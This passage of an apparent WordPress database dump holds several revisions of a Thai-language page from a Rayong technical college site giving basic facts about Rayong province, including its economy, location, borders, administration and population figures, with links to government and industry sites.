<span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>255<span lang=\"TH\">3</span> <span lang=\"TH\">มีทั้งสิ้น</span> 6<span lang=\"TH\">26</span>,4<span lang=\"TH\">03 คน เป็นชาย 309</span>,<span lang=\"TH\">014 คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 317,388 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 2<span lang=\"TH\">45</span>,<span lang=\"TH\">921</span> <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,<span lang=\"TH\">324 คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 486.03 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>261.91 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 64.67 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 638,017 <span lang=\"TH\">คนในปี</span> 2560 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลด้านต่าง ๆ ทั้งด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์อื่น ๆ เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ด้านล่าง</span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 16:06:01', '2018-01-29 09:06:01', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(838, 3, '2018-01-29 16:19:24', '2018-01-29 09:19:24', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"https://sites.google.com/site/rayongshelter/khxmul-thawpi-canghwad-rayxng\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>255<span lang=\"TH\">3</span> <span lang=\"TH\">มีทั้งสิ้น</span> 6<span lang=\"TH\">26</span>,4<span lang=\"TH\">03 คน เป็นชาย 309</span>,<span lang=\"TH\">014 คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 317,388 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 2<span lang=\"TH\">45</span>,<span lang=\"TH\">921</span> <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,<span lang=\"TH\">324 คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 486.03 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>261.91 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 64.67 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 638,017 <span lang=\"TH\">คนในปี</span> 2560 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ด้านล่าง</span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" />\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 16:19:24', '2018-01-29 09:19:24', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(839, 3, '2018-01-29 16:24:48', '2018-01-29 09:24:48', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"https://sites.google.com/site/rayongshelter/khxmul-thawpi-canghwad-rayxng\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" />\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">ขนาดและที่ตั้ง</span></b></span></h3>\r\n<div>\r\n<div>\r\n\r\n<span lang=\"TH\">จังหวัดระยองมีพื้นที่ประมาณ </span>3,552 <span lang=\"TH\">ตารางกิโลเมตร หรือ </span>2,220,000 <span lang=\"TH\">ไร่</span><span lang=\"TH\"> ตั้งอยู่ในภาคตะวันออกของประเทศไทยระหว่างเส้นรุ้งที่ </span>12-13 <span lang=\"TH\">องศาเหนือ และเส้นแวงที่ </span>101-102 <span lang=\"TH\">องศาตะวันออก ห่างจากกรุงเทพฯ ประมาณ </span>179 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> มีอาณาเขตติดต่อกับจังหวัดใกล้เคียงดังนี้</span>\r\n\r\n</div>\r\n</div>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศเหนือ </span></b><span lang=\"TH\"> ติดต่อกับเขตอำเภอหนองใหญ่ อำเภอบ่อทอง และอำเภอศรีราชา</span>ของจังหวัดชลบุรี\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศใต</span></b><span lang=\"TH\">้ จดทะเลอ่าวไทย พื้นที่ฝั่งทะเลยาวประมาณ </span>100 <span lang=\"TH\">กิโลเมตร</span><span lang=\"TH\"> ของอ่าวไทย</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันออก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอท่าใหม่ อำเภอนายายอาม ของจังหวัดจันทบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<blockquote>\r\n<div>\r\n<div>\r\n\r\n<b><span lang=\"TH\">ทิศตะวันตก</span></b> <span lang=\"TH\"> ติดต่อกับเขตอำเภอสัตหีบ อำเภอบางละมุง ของจังหวัดชลบุรี</span>\r\n\r\n</div>\r\n</div></blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n</blockquote>\r\n<strong><span style=\"color: #0000ff;\"> <a href=\"http://www.oceansmile.com/map/k/3178.gif\"><img class=\"aligncenter wp-image-830 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-44-46.jpg\" alt=\"\" width=\"1076\" height=\"707\" /></a> </span></strong>\r\n<h3><span style=\"color: #0000ff;\"><b><span lang=\"TH\">การปกครองและประชากร</span></b></span></h3>\r\n<span lang=\"TH\">แบ่งเขตการปกครองเป็น</span> 8 <span lang=\"TH\">อำเภอ โดยประกอบด้วย</span> 54 <span lang=\"TH\">ตำบล</span> 439 <span lang=\"TH\">หมู่บ้าน</span> 80 <span lang=\"TH\">ชุมชน ส่วนด้านการปกครองท้องถิ่น ประกอบด้วย องค์การบริหารส่วนจังหวัด</span> 1 <span lang=\"TH\">แห่ง เทศบาลนคร</span> 1 <span lang=\"TH\">แห่ง เทศบาลเมือง</span> 2 <span lang=\"TH\">แห่ง เทศบาลตำบล 24 แห่ง และองค์การบริหารส่วนตำบล</span> 4<span lang=\"TH\">0 แห่ง ประชากรของจังหวัดระยอง ณ ธันวาคม </span>255<span lang=\"TH\">3</span> <span lang=\"TH\">มีทั้งสิ้น</span> 6<span lang=\"TH\">26</span>,4<span lang=\"TH\">03 คน เป็นชาย 309</span>,<span lang=\"TH\">014 คน คิดเป็นร้อยละ</span>49.33 <span lang=\"TH\">เป็นหญิง 317,388 คน คิดเป็นร้อยละ</span> 50.67 <span lang=\"TH\">ของประชากรทั้งหมด อำเภอที่มีประชากรมากที่สุด คือ อำเภอเมือง มีจำนวน</span> 2<span lang=\"TH\">45</span>,<span lang=\"TH\">921</span> <span lang=\"TH\">คน อำเภอที่มีประชากรน้อยที่สุด คือ อำเภอเขาชะเมา มีจำนวน</span> 23,<span lang=\"TH\">324 คน จำนวนครัวเรือนทั้งจังหวัดรวม</span> 3<span lang=\"TH\">23</span>,<span lang=\"TH\">056 ครัวเรือน อำเภอเมืองระยองมีความหนาแน่นของประชากรมากที่สุด คือ</span> 486.03 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร รองลงมาคือ อำเภอบ้านฉาง</span>261.91 <span lang=\"TH\">คนต่อหนึ่งตารางกิโลเมตร อำเภอที่มีประชากรหนาแน่นน้อยที่สุด คืออำเภอวังจันทร์ 64.67 คนต่อหนึ่งตารางกิโลเมตร จากการคาดการณ์ว่าประชากรของจังหวัดระยองจะเพิ่มเป็น</span> 638,017 <span lang=\"TH\">คนในปี</span> 2560 <span lang=\"TH\">แต่ในสภาพความเป็นจริง จังหวัดระยองมีประชากรมากกว่าตัวเลขในทะเบียนราษฎร์ไม่ต่ำกว่า</span> 300,000 <span lang=\"TH\">คน ทั้งนี้เกิดจากการอพยพเข้ามาในแรงงานภาคอุตสาหกรรมและการบริการ และมีแนวโน้มที่จะเพิ่มขึ้นอย่างรวดเร็วตามการเติบโตของภาคอุตสาหกรรม</span>\r\n<h3></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลด้านประวัติศาสตร์ ภูมิศาสตร์ เศรษฐกิจ สังคม การศึกษา และสาระที่เป็นประโยชน์ด้านอื่น ๆ เกี่ยวกับจังหวัดระยองเพิ่มเติม >>>> ตามเวปไซต์ด้านล่าง</span></h3>\r\n<h3><span style=\"color: #0000ff;\"><a href=\"http://www.rayong.go.th/\"><img class=\"alignleft wp-image-831 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-38.jpg\" alt=\"\" width=\"698\" height=\"146\" /></a> </span></h3>\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/industry/index.php/th/\"><img class=\"alignleft wp-image-832 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-58-49.jpg\" alt=\"\" width=\"701\" height=\"116\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.industry.go.th/rayong/\"><img class=\"alignleft wp-image-833 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-16.jpg\" alt=\"\" width=\"729\" height=\"123\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.fti-rayong.com/\"><img class=\"alignleft wp-image-834 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-28.jpg\" alt=\"\" width=\"424\" height=\"104\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.aecthaibiz.com/province/main.html?pv=21\"><img class=\"alignleft wp-image-835 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-59-38.jpg\" alt=\"\" width=\"422\" height=\"89\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n ', 'ข้อมูลพื้นฐานจังหวัด', '', 'inherit', 'closed', 'closed', '', '821-revision-v1', '', '', '2018-01-29 16:24:48', '2018-01-29 09:24:48', '', 821, 'http://www.technicrayong.ac.th/821-revision-v1/', 0, 'revision', '', 0),
(840, 3, '2018-01-29 16:25:56', '2018-01-29 09:25:56', '<img class=\"aligncenter wp-image-822 size-full\" src=\"/wp-content/uploads/2018/01/GPP55-e1517214593488.jpg\" alt=\"\" width=\"1106\" height=\"700\" />\r\n<h3 id=\"sites-page-title-header\" align=\"left\"><span id=\"sites-page-title\" dir=\"ltr\" style=\"color: #0000ff;\" tabindex=\"-1\">ข้อมูลทั่วไปจังหวัดระยอง</span></h3>\r\n<div> ระยอง....เป็นจังหวัดขนาดเล็กแห่งหนึ่งในภาคตะวันออกของประเทศ เป็นที่รู้จักในปัจจุบันว่าเป็นแหล่งท่องเที่ยว มีผลไม้ชั้นยอด เป็นแหล่งอุตสาหกรรมหลักของประเทศ มีสภาพเศรษฐกิจดี มีรายได้<span lang=\"TH\">ต่อหัวประชากรสูงเป็นอันดับหนึ่งของประเทศ คือ 1</span>,<span lang=\"TH\">143</span>,<span lang=\"TH\">740 บาท/ คน ผลิตภัณฑ์มวลรวมจังหวัด (</span>GPP<span lang=\"TH\">) เท่ากับ</span> <span lang=\"TH\">672</span>,<span lang=\"TH\">104 ล้านบาท ซึ่งมาจากสาขาการผลิตด้านอุตสาหกรรมและเหมืองแร่ กว่าร้อยละ 92</span></div>\r\n<div> แต่เดิมจังหวัดระยองเป็นที่รู้จักในฐานะเมืองผลไม้ดีของภาคตะวันออ ไม่ว่าจะเป็นมังคุด ทุเรียน เงาะ รวมทั้งอาหารทะเลสด แปรรูป กะปิ น้ำปลา เนื่องจากสภาพดินฟ้าอากาศที่เอื้ออำนวย และสภาพภูมิประเทศที่เหมาะสม นอกจากนี้ยังได้ชื่อว่าเป็นเมืองท่องเที่ยวที่สวยงาม มีชายหาดยาวสวยเลียบขนานไปกับอ่าวไทย และเกาะสวยงามระดับโลก เช่น เกาะเสม็ดที่รู้จักกันแพร่หลายท่ามกลางนักท่องเที่ยวชาวไทย และ<span lang=\"TH\">ชาวต่างประเทศฐานเศรษฐกิจที่สำคัญของจังหวัด คือ ภาคเกษตรกรรม การท่องเที่ยวและภาคอุตสาหกรรม (ข้อมูลสรุปจังหวัดระยอง ปี </span>2553<span lang=\"TH\">)</span></div>\r\n<div> จังหวัดระยองเริ่มมีการเปลี่ยนแปลงเป็นจังหวัดอุตสาหกรรม นับตั้งแต่ค้นพบก๊าซธรรมชาติ <span lang=\"TH\">ในอ่าวไทยเมื่อปี พ</span>.<span lang=\"TH\">ศ</span>. 2520 <span lang=\"TH\">เป็นการเริ่มต้นยุค </span>“<span lang=\"TH\">โชติช่วงชัชวาล</span>”<span lang=\"TH\"> และเป็นที่มาของ </span>“<span lang=\"TH\">โครงการพัฒนาพื้นที่ชายฝั่งทะเลภาคตะวันออก</span>”<span lang=\"TH\"> ( </span>Eastern Seaboard Development Program<span lang=\"TH\"> ) ในปี 2524 ช่วงระยะเวลาเกือบ 30 ปี ทำให้โครงสร้างทางเศรษฐกิจของจังหวัดระยองเปลี่ยนเป็นอุตสาหกรรมนำการท่องเที่ยวและเกษตรกรรม <span style=\"color: #0000ff;\">>>>></span></span><a href=\"https://sites.google.com/site/rayongshelter/khxmul-thawpi-canghwad-rayxng\"><span style=\"color: #0000ff;\">ข้อมูลเพิ่มเติม</span></a></div>\r\n<div></div>\r\n<div></div>\r\n<img class=\"aligncenter wp-image-826 size-full\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-06-39.jpg\" alt=\"\" width=\"696\" height=\"632\" />\r\n\r\n<img class=\"wp-image-827 size-full aligncenter\" src=\"/wp-content/uploads/2018/01/29-1-2561-15-09-24.jpg\" alt=\"\" width=\"645\" height=\"271\" 